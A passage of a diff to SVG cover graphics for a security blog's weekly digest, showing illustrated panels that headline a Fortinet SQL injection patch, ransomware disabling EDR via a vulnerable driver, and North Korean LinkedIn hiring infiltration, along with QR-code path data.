29h1v1h-1zM19 29h3v1h-3zM24 29h2v1h-2zM27 29h1v1h-1zM29 29h3v1h-3zM35 29h1v1h-1zM37 29h2v1h-2zM40 29h1v1h-1zM0 30h1v1h-1zM4 30h1v1h-1zM6 30h2v1h-2zM9 30h3v1h-3zM13 30h1v1h-1zM17 30h1v1h-1zM22 30h4v1h-4zM35 30h1v1h-1zM38 30h3v1h-3zM4 31h1v1h-1zM7 31h1v1h-1zM9 31h1v1h-1zM14 31h1v1h-1zM16 31h2v1h-2zM21 31h1v1h-1zM24 31h1v1h-1zM26 31h1v1h-1zM29 31h1v1h-1zM31 31h3v1h-3zM36 31h2v1h-2zM0 32h1v1h-1zM2 32h3v1h-3zM6 32h2v1h-2zM10 32h2v1h-2zM14 32h1v1h-1zM20 32h1v1h-1zM25 32h3v1h-3zM31 32h6v1h-6zM38 32h1v1h-1zM40 32h1v1h-1zM8 33h2v1h-2zM13 33h1v1h-1zM16 33h5v1h-5zM24 33h2v1h-2zM27 33h6v1h-6zM36 33h5v1h-5zM0 34h7v1h-7zM9 34h7v1h-7zM18 34h2v1h-2zM21 34h2v1h-2zM25 34h2v1h-2zM28 34h1v1h-1zM30 34h1v1h-1zM32 34h1v1h-1zM34 34h1v1h-1zM36 34h1v1h-1zM38 34h2v1h-2zM0 35h1v1h-1zM6 35h1v1h-1zM8 35h1v1h-1zM11 35h2v1h-2zM14 35h1v1h-1zM16 35h1v1h-1zM18 35h3v1h-3zM24 35h2v1h-2zM27 35h1v1h-1zM30 35h1v1h-1zM32 35h1v1h-1zM36 35h1v1h-1zM38 35h1v1h-1zM40 35h1v1h-1zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM14 36h2v1h-2zM18 36h3v1h-3zM26 36h5v1h-5zM32 36h6v1h-6zM39 36h1v1h-1zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM8 37h3v1h-3zM14 37h1v1h-1zM16 37h1v1h-1zM18 37h5v1h-5zM26 37h1v1h-1zM28 37h2v1h-2zM31 37h4v1h-4zM36 37h2v1h-2zM40 37h1v1h-1zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM9 38h3v1h-3zM13 38h2v1h-2zM17 38h2v1h-2zM20 38h2v1h-2zM23 38h4v1h-4zM28 38h1v1h-1zM30 38h2v1h-2zM36 38h5v1h-5zM0 39h1v1h-1zM6 39h1v1h-1zM10 39h9v1h-9zM21 39h3v1h-3zM25 39h2v1h-2zM28 39h6v1h-6zM35 39h1v1h-1zM39 39h1v1h-1zM0 40h7v1h-7zM8 40h1v1h-1zM10 40h6v1h-6zM18 40h5v1h-5zM24 40h1v1h-1zM29 40h1v1h-1zM31 40h7v1h-7zM39 40h1v1h-1z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-11-Tech_Security_Weekly_Digest_Security_Ransomware_Patch_AI.svg
+++ b/assets/images/2026-02-11-Tech_Security_Weekly_Digest_Security_Ransomware_Patch_AI.svg
@@ -1,134 +1,297 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 11, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Fortinet Critical SQLi patch, Reynolds ransomware BYOVD EDR bypass, DPRK LinkedIn infiltration">
+<!-- profile: high-quality-cover (L20 Hero+2-Card, research-based, batch1-locked) -->
+<title>Fortinet Critical SQLi Patch, Ransomware BYOVD, DPRK LinkedIn Infiltration - 2026.02.11</title>
+<defs>
+  <linearGradient id="bgGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#090E1F"/>
+    <stop offset="55%" stop-color="#0B1228"/>
+    <stop offset="100%" stop-color="#0F1530"/>
+  </linearGradient>
+  <linearGradient id="heroPanelGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#1A0E1E"/>
+    <stop offset="100%" stop-color="#120A1C"/>
+  </linearGradient>
+  <linearGradient id="topRightGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#14120A"/>
+    <stop offset="100%" stop-color="#100E08"/>
+  </linearGradient>
+  <linearGradient id="botRightGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0A1325"/>
+    <stop offset="100%" stop-color="#0C1630"/>
+  </linearGradient>
+  <linearGradient id="kpiRed" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#B02020" stop-opacity="0.95"/>
+    <stop offset="100%" stop-color="#7A1010" stop-opacity="0.9"/>
+  </linearGradient>
+  <linearGradient id="kpiAmber" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#C47A08" stop-opacity="0.95"/>
+    <stop offset="100%" stop-color="#8A5206" stop-opacity="0.9"/>
+  </linearGradient>
+  <linearGradient id="kpiBlue" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#1A5CA8" stop-opacity="0.95"/>
+    <stop offset="100%" stop-color="#103A72" stop-opacity="0.9"/>
+  </linearGradient>
+  <linearGradient id="dbBodyGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2A1040"/>
+    <stop offset="100%" stop-color="#1A0828"/>
+  </linearGradient>
+  <linearGradient id="dbTopGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#4A2268"/>
+    <stop offset="100%" stop-color="#381850"/>
+  </linearGradient>
+  <linearGradient id="shieldBodyGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#4A0E18"/>
+    <stop offset="100%" stop-color="#2E0810"/>
+  </linearGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.4"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#F4A623" stop-opacity="0.38"/>
+    <stop offset="100%" stop-color="#F4A623" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.38"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="36" height="36" patternUnits="userSpaceOnUse">
+    <circle cx="18" cy="18" r="0.85" fill="#2A3560" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-15%" y="-15%" width="135%" height="135%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="3"/>
+    <feOffset dx="2" dy="4"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.45"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <clipPath id="heroClip"><rect x="32" y="80" width="600" height="510" rx="10"/></clipPath>
+  <clipPath id="topRightClip"><rect x="652" y="80" width="516" height="248" rx="10"/></clipPath>
+  <clipPath id="botRightClip"><rect x="652" y="344" width="516" height="246" rx="10"/></clipPath>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- GLOBAL BACKGROUND -->
+<rect width="1200" height="630" fill="url(#bgGrad)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)" opacity="0.75"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- HEADER BAR -->
+<rect x="0" y="0" width="1200" height="72" fill="#080C1A" opacity="0.97"/>
+<rect x="0" y="70" width="1200" height="2" fill="#1A2236"/>
+<rect x="0" y="0" width="4" height="72" fill="#E63946"/>
+<text x="32" y="41" font-family="Arial,Helvetica,sans-serif" font-size="13" font-weight="700" letter-spacing="4" fill="#4A6FA5">TECH SECURITY WEEKLY</text>
+<text x="32" y="59" font-family="Arial,Helvetica,sans-serif" font-size="10" fill="#334060" letter-spacing="3">DIGEST</text>
+<text x="1168" y="36" font-family="Arial,Helvetica,sans-serif" font-size="22" font-weight="700" fill="#FFFFFF" text-anchor="end" letter-spacing="1">2026.02.11</text>
+<text x="1168" y="56" font-family="Arial,Helvetica,sans-serif" font-size="10" fill="#506070" text-anchor="end" letter-spacing="2">26 STORIES</text>
+
+<!-- ===== HERO PANEL LEFT 600x510 at (32,80) ===== -->
+<rect x="32" y="80" width="600" height="510" rx="10" fill="url(#heroPanelGrad)"/>
+<!-- Hero 4px top stripe: CRITICAL red -->
+<rect x="32" y="80" width="600" height="4" rx="2" fill="#E63946"/>
+<!-- Ambient glow -->
+<circle cx="332" cy="320" r="190" fill="url(#glowRed)" opacity="0.55">
+  <animate attributeName="opacity" values="0.4;0.75;0.4" dur="6.5s" repeatCount="indefinite"/>
+  <animate attributeName="r" values="190;215;190" dur="8.2s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Hero eyebrow badge -->
+<rect x="52" y="100" width="84" height="22" rx="4" fill="#E63946" opacity="0.92"/>
+<text x="94" y="115" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#FFFFFF" text-anchor="middle" letter-spacing="2">CRITICAL</text>
+
+<!-- Hero title -->
+<text x="52" y="150" font-family="Arial,Helvetica,sans-serif" font-size="25" font-weight="900" fill="#FFFFFF" filter="url(#softShadow)">Fortinet Critical SQLi</text>
+<text x="52" y="180" font-family="Arial,Helvetica,sans-serif" font-size="25" font-weight="900" fill="#E63946">CVE-2026-21643</text>
+
+<!-- Hero subtitle -->
+<text x="52" y="208" font-family="Arial,sans-serif" font-size="12.5" fill="#90A8C0" letter-spacing="0.3">Unauthenticated access via SQL injection — emergency patch</text>
+
+<!-- SHIELD ILLUSTRATION -->
+<path d="M332 236 L424 268 L424 342 Q424 396 332 428 Q240 396 240 342 L240 268 Z" fill="url(#shieldBodyGrad)" stroke="#E63946" stroke-width="2.5" filter="url(#softShadow)">
+  <animate attributeName="stroke-opacity" values="0.55;1.0;0.55" dur="3.2s" repeatCount="indefinite"/>
+</path>
+<path d="M332 252 L412 280 L412 342 Q412 388 332 416 Q252 388 252 342 L252 280 Z" fill="none" stroke="#FF6B6B" stroke-width="1.2" opacity="0.4"/>
+<!-- Warning exclamation -->
+<text x="332" y="366" font-family="Arial,sans-serif" font-size="60" fill="#E63946" text-anchor="middle" opacity="0.92">!</text>
+<text x="332" y="316" font-family="Arial,sans-serif" font-size="11" fill="#FF8888" text-anchor="middle" font-weight="700" letter-spacing="1.5">UNPATCHED</text>
+<!-- Pulse ring -->
+<ellipse cx="332" cy="340" rx="90" ry="96" fill="none" stroke="#E63946" stroke-width="1.2" opacity="0.25">
+  <animate attributeName="rx" values="90;110;90" dur="4.0s" repeatCount="indefinite"/>
+  <animate attributeName="ry" values="96;116;96" dur="4.0s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0.25;0.6;0.25" dur="4.0s" repeatCount="indefinite"/>
+</ellipse>
+
+<!-- DATABASE (SQLi target) -->
+<ellipse cx="332" cy="456" rx="40" ry="11" fill="#4A2268"/>
+<rect x="292" y="435" width="80" height="28" fill="url(#dbBodyGrad)"/>
+<ellipse cx="332" cy="435" rx="40" ry="11" fill="url(#dbTopGrad)"/>
+<text x="332" y="432" font-family="Arial,sans-serif" font-size="8" fill="#9060C8" text-anchor="middle" letter-spacing="0.8">DATABASE</text>
+<!-- SQLi crack -->
+<path d="M315 428 L332 448 L325 443 L340 462" stroke="#E63946" stroke-width="2" fill="none" stroke-dasharray="3,2">
+  <animate attributeName="opacity" values="0.5;1;0.5" dur="2.2s" repeatCount="indefinite"/>
+</path>
+<text x="332" y="478" font-family="Arial,sans-serif" font-size="9.5" fill="#7030A0" text-anchor="middle" letter-spacing="0.8">SQL INJECTION</text>
+
+<!-- Attack path arrows (hand-drawn dashes) -->
+<path d="M218 286 Q262 286 258 340" stroke="#FF4444" stroke-width="1.5" fill="none" stroke-dasharray="5,3" opacity="0.65">
+  <animate attributeName="stroke-dashoffset" values="0;-16" dur="1.3s" repeatCount="indefinite"/>
+</path>
+<path d="M446 286 Q402 286 406 340" stroke="#FF4444" stroke-width="1.5" fill="none" stroke-dasharray="5,3" opacity="0.65">
+  <animate attributeName="stroke-dashoffset" values="0;-16" dur="1.3s" repeatCount="indefinite"/>
+</path>
+<!-- Attacker nodes -->
+<circle cx="196" cy="272" r="17" fill="#3A0810" stroke="#E63946" stroke-width="1.5"/>
+<text x="196" y="277" font-family="Arial,sans-serif" font-size="13" fill="#E63946" text-anchor="middle">H</text>
+<text x="196" y="302" font-family="Arial,sans-serif" font-size="8.5" fill="#804040" text-anchor="middle">ATTACKER</text>
+<circle cx="468" cy="272" r="17" fill="#3A0810" stroke="#E63946" stroke-width="1.5"/>
+<text x="468" y="277" font-family="Arial,sans-serif" font-size="13" fill="#E63946" text-anchor="middle">H</text>
+<text x="468" y="302" font-family="Arial,sans-serif" font-size="8.5" fill="#804040" text-anchor="middle">ATTACKER</text>
+
+<!-- Hero KPI row -->
+<rect x="52" y="498" width="168" height="62" rx="6" fill="url(#kpiRed)" filter="url(#softShadow)"/>
+<text x="136" y="519" font-family="Arial,sans-serif" font-size="9.5" fill="#FFB0B0" text-anchor="middle" letter-spacing="1.5">SEVERITY</text>
+<text x="136" y="540" font-family="Arial,sans-serif" font-size="19" font-weight="900" fill="#FFFFFF" text-anchor="middle">CRITICAL</text>
+<text x="136" y="554" font-family="Arial,sans-serif" font-size="8.5" fill="#FF8888" text-anchor="middle">CVSS 9.8</text>
+
+<rect x="234" y="498" width="150" height="62" rx="6" fill="#1C0A30" stroke="#6020A0" stroke-width="1"/>
+<text x="309" y="519" font-family="Arial,sans-serif" font-size="9.5" fill="#9060C0" text-anchor="middle" letter-spacing="1">VECTOR</text>
+<text x="309" y="540" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#C890FF" text-anchor="middle">NETWORK</text>
+<text x="309" y="554" font-family="Arial,sans-serif" font-size="8.5" fill="#7040A0" text-anchor="middle">No Auth Required</text>
+
+<rect x="398" y="498" width="212" height="62" rx="6" fill="#1A0A12" stroke="#782222" stroke-width="1"/>
+<text x="504" y="519" font-family="Arial,sans-serif" font-size="9.5" fill="#904040" text-anchor="middle" letter-spacing="1">AFFECTED</text>
+<text x="504" y="540" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#FF8888" text-anchor="middle">FORTIGATE</text>
+<text x="504" y="554" font-family="Arial,sans-serif" font-size="8.5" fill="#7A3030" text-anchor="middle">FortiOS / FortiProxy</text>
+
+<!-- Panel vertical separator -->
+<rect x="640" y="80" width="4" height="510" rx="2" fill="#151E30"/>
+
+<!-- ===== TOP-RIGHT PANEL 516x248 at (652,80) — Ransomware BYOVD ===== -->
+<rect x="652" y="80" width="516" height="248" rx="10" fill="url(#topRightGrad)"/>
+<!-- Stripe: amber -->
+<rect x="652" y="80" width="516" height="4" rx="2" fill="#F4A623"/>
+<!-- Ambient glow -->
+<circle cx="905" cy="204" r="95" fill="url(#glowAmber)" opacity="0.42">
+  <animate attributeName="opacity" values="0.28;0.6;0.28" dur="5.8s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Eyebrow -->
+<rect x="672" y="100" width="55" height="19" rx="3" fill="#C47A08" opacity="0.92"/>
+<text x="699" y="113" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#FFFFFF" text-anchor="middle" letter-spacing="1.5">HIGH</text>
+
+<text x="672" y="139" font-family="Arial,Helvetica,sans-serif" font-size="17" font-weight="800" fill="#FFFFFF">Reynolds Ransomware</text>
+<text x="672" y="159" font-family="Arial,sans-serif" font-size="12" fill="#F4A623">BYOVD — EDR Bypass via Embedded Driver</text>
+<text x="672" y="176" font-family="Arial,sans-serif" font-size="10" fill="#7A8080" letter-spacing="0.2">Vulnerable driver bundled in payload; silences EDR before encryption</text>
+
+<!-- EDR bypass visual -->
+<!-- Shield with X (EDR killed) -->
+<rect x="882" y="100" width="52" height="52" rx="6" fill="#1A1804" stroke="#F4A623" stroke-width="1.5"/>
+<line x1="894" y1="112" x2="922" y2="140" stroke="#F4A623" stroke-width="2.5" opacity="0.85"/>
+<line x1="922" y1="112" x2="894" y2="140" stroke="#F4A623" stroke-width="2.5" opacity="0.85"/>
+<text x="908" y="166" font-family="Arial,sans-serif" font-size="8" fill="#907040" text-anchor="middle">EDR KILLED</text>
+
+<!-- Driver icon -->
+<rect x="948" y="106" width="44" height="40" rx="4" fill="#0A1804" stroke="#80C040" stroke-width="1"/>
+<text x="970" y="130" font-family="Arial,sans-serif" font-size="17" fill="#80C040" text-anchor="middle">D</text>
+<text x="970" y="148" font-family="Arial,sans-serif" font-size="7" fill="#4A7030" text-anchor="middle">DRIVER</text>
+
+<!-- Arrow driver->EDR -->
+<path d="M948 126 L937 126" stroke="#F4A623" stroke-width="1.5" fill="none">
+  <animate attributeName="opacity" values="0.35;1.0;0.35" dur="1.8s" repeatCount="indefinite"/>
+</path>
+
+<!-- Ransomware lock -->
+<rect x="1006" y="98" width="56" height="58" rx="7" fill="#1A0C00" stroke="#F4A623" stroke-width="2"/>
+<path d="M1022 124 L1022 116 Q1022 106 1034 106 Q1046 106 1046 116 L1046 124" stroke="#F4A623" stroke-width="2" fill="none"/>
+<rect x="1024" y="124" width="20" height="16" rx="3" fill="#F4A623" opacity="0.82"/>
+<text x="1034" y="177" font-family="Arial,sans-serif" font-size="8" fill="#907040" text-anchor="middle">ENCRYPTED</text>
+
+<!-- KPI row -->
+<rect x="672" y="192" width="160" height="46" rx="5" fill="url(#kpiAmber)"/>
+<text x="752" y="209" font-family="Arial,sans-serif" font-size="9" fill="#FFF0C0" text-anchor="middle" letter-spacing="1">TECHNIQUE</text>
+<text x="752" y="228" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#FFFFFF" text-anchor="middle">BYOVD</text>
+
+<rect x="846" y="192" width="144" height="46" rx="5" fill="#1A1200" stroke="#806010" stroke-width="1"/>
+<text x="918" y="209" font-family="Arial,sans-serif" font-size="9" fill="#907030" text-anchor="middle" letter-spacing="1">IMPACT</text>
+<text x="918" y="228" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#F4A623" text-anchor="middle">EDR BLIND SPOT</text>
+
+<!-- Panel horizontal separator -->
+<rect x="652" y="332" width="516" height="4" rx="2" fill="#10182A"/>
+<rect x="652" y="336" width="516" height="4" rx="2" fill="#0C1220"/>
+
+<!-- ===== BOTTOM-RIGHT PANEL 516x246 at (652,344) — DPRK LinkedIn ===== -->
+<rect x="652" y="344" width="516" height="246" rx="10" fill="url(#botRightGrad)"/>
+<!-- Stripe: blue -->
+<rect x="652" y="344" width="516" height="4" rx="2" fill="#3A86FF"/>
+<!-- Ambient glow -->
+<circle cx="905" cy="462" r="95" fill="url(#glowBlue)" opacity="0.38">
+  <animate attributeName="opacity" values="0.22;0.52;0.22" dur="7.2s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Eyebrow -->
+<rect x="672" y="363" width="60" height="19" rx="3" fill="#1A5CA8" opacity="0.92"/>
+<text x="702" y="376" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#FFFFFF" text-anchor="middle" letter-spacing="1">MEDIUM</text>
+
+<text x="672" y="404" font-family="Arial,Helvetica,sans-serif" font-size="17" font-weight="800" fill="#FFFFFF">DPRK LinkedIn Infiltration</text>
+<text x="672" y="422" font-family="Arial,sans-serif" font-size="12" fill="#3A86FF">IT Worker Account Takeover</text>
+<text x="672" y="439" font-family="Arial,sans-serif" font-size="10" fill="#608090" letter-spacing="0.2">Stolen profiles + verified badges bypass hiring checks</text>
+
+<!-- LinkedIn fake profile mockup -->
+<rect x="870" y="360" width="108" height="76" rx="6" fill="#0A1830" stroke="#1A5CA8" stroke-width="1.5"/>
+<circle cx="894" cy="384" r="12" fill="#142A50" stroke="#3A86FF" stroke-width="1"/>
+<text x="894" y="389" font-family="Arial,sans-serif" font-size="10" fill="#3A86FF" text-anchor="middle">?</text>
+<rect x="910" y="377" width="52" height="6" rx="2" fill="#1E3A60"/>
+<rect x="910" y="389" width="38" height="5" rx="2" fill="#142840"/>
+<!-- Verified badge (fake) -->
+<circle cx="956" cy="374" r="8" fill="#204090" stroke="#3A86FF" stroke-width="1"/>
+<text x="956" y="378" font-family="Arial,sans-serif" font-size="8" fill="#FFFFFF" text-anchor="middle">v</text>
+<text x="924" y="434" font-family="Arial,sans-serif" font-size="7.5" fill="#406080" text-anchor="middle">SPOOFED PROFILE</text>
+
+<!-- Arrow to company -->
+<path d="M978 400 L1056 400" stroke="#3A86FF" stroke-width="1.5" stroke-dasharray="4,2" fill="none">
+  <animate attributeName="stroke-dashoffset" values="0;-12" dur="1.5s" repeatCount="indefinite"/>
+</path>
+<!-- Company building -->
+<rect x="1058" y="375" width="48" height="48" rx="4" fill="#0A1830" stroke="#3A86FF" stroke-width="1"/>
+<rect x="1065" y="384" width="9" height="9" rx="1" fill="#1A3A60"/>
+<rect x="1080" y="384" width="9" height="9" rx="1" fill="#1A3A60"/>
+<rect x="1065" y="399" width="9" height="9" rx="1" fill="#1A3A60"/>
+<rect x="1080" y="399" width="9" height="9" rx="1" fill="#1A3A60"/>
+<text x="1082" y="434" font-family="Arial,sans-serif" font-size="7.5" fill="#204060" text-anchor="middle">CORP</text>
+
+<!-- MITRE tags -->
+<rect x="672" y="456" width="70" height="17" rx="3" fill="#0A1830" stroke="#1A3A60" stroke-width="1"/>
+<text x="707" y="468" font-family="Arial,sans-serif" font-size="7.5" fill="#3A70A8" text-anchor="middle">T1586.003</text>
+<rect x="750" y="456" width="52" height="17" rx="3" fill="#0A1830" stroke="#1A3A60" stroke-width="1"/>
+<text x="776" y="468" font-family="Arial,sans-serif" font-size="7.5" fill="#3A70A8" text-anchor="middle">T1566</text>
+<rect x="810" y="456" width="50" height="17" rx="3" fill="#0A1830" stroke="#1A3A60" stroke-width="1"/>
+<text x="835" y="468" font-family="Arial,sans-serif" font-size="7.5" fill="#3A70A8" text-anchor="middle">T1078</text>
+
+<!-- KPI row -->
+<rect x="672" y="482" width="158" height="46" rx="5" fill="url(#kpiBlue)"/>
+<text x="751" y="499" font-family="Arial,sans-serif" font-size="9" fill="#C0D8FF" text-anchor="middle" letter-spacing="1">THREAT ACTOR</text>
+<text x="751" y="518" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#FFFFFF" text-anchor="middle">DPRK / LAZARUS</text>
+
+<rect x="844" y="482" width="156" height="46" rx="5" fill="#081122" stroke="#1A3060" stroke-width="1"/>
+<text x="922" y="499" font-family="Arial,sans-serif" font-size="9" fill="#3A5880" text-anchor="middle" letter-spacing="1">VECTOR</text>
+<text x="922" y="518" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3A86FF" text-anchor="middle">SOCIAL ENG.</text>
+
+<!-- FOOTER -->
+<rect x="0" y="600" width="1200" height="30" fill="#070B18" opacity="0.95"/>
+<rect x="0" y="600" width="1200" height="1.5" fill="#18223A"/>
+<text x="32" y="619" font-family="Arial,sans-serif" font-size="9.5" fill="#2E4060" letter-spacing="1">SECURITY: 5</text>
+<rect x="118" y="611" width="1" height="12" fill="#18223A"/>
+<text x="128" y="619" font-family="Arial,sans-serif" font-size="9.5" fill="#2E4060" letter-spacing="1">AI/ML: 4</text>
+<rect x="192" y="611" width="1" height="12" fill="#18223A"/>
+<text x="202" y="619" font-family="Arial,sans-serif" font-size="9.5" fill="#2E4060" letter-spacing="1">CLOUD: 4</text>
+<rect x="266" y="611" width="1" height="12" fill="#18223A"/>
+<text x="276" y="619" font-family="Arial,sans-serif" font-size="9.5" fill="#2E4060" letter-spacing="1">DEVOPS: 3</text>
+<rect x="348" y="611" width="1" height="12" fill="#18223A"/>
+<text x="358" y="619" font-family="Arial,sans-serif" font-size="9.5" fill="#2E4060" letter-spacing="1">BLOCKCHAIN: 5</text>
+<text x="1168" y="619" font-family="Arial,sans-serif" font-size="9.5" fill="#243650" text-anchor="end">tech.2twodragon.com</text>
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/11/Tech_Security_Weekly_Digest_Security_Ransomware_Patch_AI/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h3v1h-3zM13 0h2v1h-2zM19 0h2v1h-2zM22 0h1v1h-1zM28 0h1v1h-1zM30 0h3v1h-3zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM8 1h3v1h-3zM15 1h3v1h-3zM21 1h3v1h-3zM26 1h1v1h-1zM30 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h2v1h-2zM12 2h3v1h-3zM16 2h1v1h-1zM18 2h3v1h-3zM24 2h2v1h-2zM30 2h3v1h-3zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h6v1h-6zM18 3h1v1h-1zM20 3h3v1h-3zM25 3h5v1h-5zM32 3h1v1h-1zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM11 4h1v1h-1zM14 4h1v1h-1zM18 4h1v1h-1zM23 4h2v1h-2zM26 4h2v1h-2zM29 4h1v1h-1zM31 4h2v1h-2zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM9 5h1v1h-1zM11 5h1v1h-1zM15 5h1v1h-1zM17 5h6v1h-6zM24 5h1v1h-1zM28 5h1v1h-1zM30 5h2v1h-2zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM8 7h1v1h-1zM11 7h2v1h-2zM14 7h1v1h-1zM17 7h1v1h-1zM19 7h1v1h-1zM24 7h1v1h-1zM26 7h1v1h-1zM29 7h1v1h-1zM31 7h2v1h-2zM0 8h1v1h-1zM2 8h2v1h-2zM5 8h3v1h-3zM9 8h2v1h-2zM12 8h7v1h-7zM21 8h1v1h-1zM23 8h2v1h-2zM26 8h1v1h-1zM29 8h4v1h-4zM34 8h1v1h-1zM37 8h1v1h-1zM39 8h2v1h-2zM1 9h1v1h-1zM3 9h1v1h-1zM5 9h1v1h-1zM7 9h1v1h-1zM9 9h1v1h-1zM13 9h1v1h-1zM16 9h1v1h-1zM18 9h2v1h-2zM21 9h1v1h-1zM23 9h1v1h-1zM26 9h1v1h-1zM30 9h3v1h-3zM35 9h2v1h-2zM38 9h1v1h-1zM1 10h3v1h-3zM6 10h1v1h-1zM10 10h1v1h-1zM12 10h1v1h-1zM16 10h1v1h-1zM20 10h1v1h-1zM22 10h2v1h-2zM25 10h2v1h-2zM29 10h1v1h-1zM33 10h2v1h-2zM38 10h2v1h-2zM0 11h1v1h-1zM4 11h1v1h-1zM7 11h1v1h-1zM9 11h1v1h-1zM15 11h2v1h-2zM18 11h1v1h-1zM20 11h1v1h-1zM22 11h1v1h-1zM24 11h2v1h-2zM27 11h1v1h-1zM32 11h1v1h-1zM36 11h1v1h-1zM39 11h2v1h-2zM1 12h2v1h-2zM5 12h2v1h-2zM9 12h1v1h-1zM12 12h1v1h-1zM15 12h1v1h-1zM17 12h1v1h-1zM19 12h1v1h-1zM22 12h1v1h-1zM25 12h1v1h-1zM28 12h5v1h-5zM35 12h1v1h-1zM37 12h4v1h-4zM2 13h2v1h-2zM8 13h2v1h-2zM11 13h2v1h-2zM17 13h1v1h-1zM21 13h1v1h-1zM23 13h4v1h-4zM28 13h1v1h-1zM30 13h2v1h-2zM33 13h2v1h-2zM37 13h1v1h-1zM39 13h2v1h-2zM0 14h1v1h-1zM2 